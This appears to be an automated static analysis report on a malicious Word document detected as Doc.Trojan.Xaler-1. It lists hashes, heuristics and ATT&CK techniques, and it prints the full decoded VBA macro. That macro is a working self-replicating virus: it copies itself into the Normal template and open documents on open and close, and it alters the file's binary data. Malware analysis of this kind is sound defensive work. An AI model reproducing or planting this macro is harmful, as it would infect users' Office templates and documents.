Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5b89b0fc6e5a2b56…

MALICIOUS

Office (OLE)

353.5 KB Created: 2012-09-24 05:01:00 Authoring application: Microsoft Office Word First seen: 2015-10-02
MD5: d54bcad088e8ed24bac94d5f12be06a0 SHA-1: 34b0511e8bc7f65bbf1313d38a91c7649c76095c SHA-256: 5b89b0fc6e5a2b568a41db9a61a8a79c5a89f0e50bf53888d6b356a3c26166eb
210 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a Word document containing VBA macros. The 'Document_Open' and 'Document_Close' subroutines trigger the 'GOODSub' function, which attempts to export and re-insert VBA code into the Normal template and the active document. This self-replication behavior, along with the ClamAV detection 'Doc.Trojan.Xaler-1', strongly suggests malicious intent, likely for persistence or to spread the macro. The macro also attempts to tamper with AV by writing to the document's binary data.

Heuristics 5

  • ClamAV: Doc.Trojan.Xaler-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Xaler-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    NormalTemplate.VBProject.VBComponents.Item("ThisDocument").CodeModule.InsertLines 1, keimeno
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2761 bytes
SHA-256: 192d4e7314bc9bb354b649a1fdecb6c69b5551207ef8f1ad76f87b21f9af9188
Detection
ClamAV: Doc.Trojan.Xaler-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'RELAX
Private Sub RELAX2()
End
End Sub

Private Sub Document_Close()
Call GOODSub
Call RELAX2
End Sub

Private Sub GOODSub()
On Error Resume Next
Application.ScreenUpdating = False
Application.Options.SaveNormalPrompt = False
x$ = "C:\temp.tmp"
MacroContainer.VBProject.VBComponents.Item("ThisDocument").Export x$
Open x$ For Input As #1
keimeno = Input(LOF(1), 1)
Close #1
kk& = InStr(1, keimeno, "'RELAX")
keimeno = Right$(keimeno, Len(keimeno) - kk& + 1)
For j = 1 To 2
If j = 1 Then
NormalTemplate.VBProject.VBComponents.Item("ThisDocument").Export x$
Else
ActiveDocument.VBProject.VBComponents.Item("ThisDocument").Export x$
End If
Open x$ For Input As #1
rlx = Input(LOF(1), 1)
Close #1
d1 = InStr(1, rlx, "'RELAX")
If d1 = 0 Then
If j = 1 Then
NormalTemplate.VBProject.VBComponents.Item("ThisDocument").CodeModule.InsertLines 1, keimeno
NormalTemplate.Save
Else
ActiveDocument.VBProject.VBComponents.Item("ThisDocument").CodeModule.InsertLines 1, keimeno
End If
End If
Next j
'====================
Dim PRostasia As Byte
PRostasia = 1
fff = FreeFile
If Dir(ActiveDocument.FullName, 6) <> "" Then
Open ActiveDocument.FullName For Binary As #fff
Put #fff, 862, PRostasia
Close #fff
ActiveDocument.Save
End If
Kill x$
Application.ScreenUpdating = True
End Sub

Private Sub Document_Open()
Call GOODSub
End Sub































































































































































































'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo
'qexdo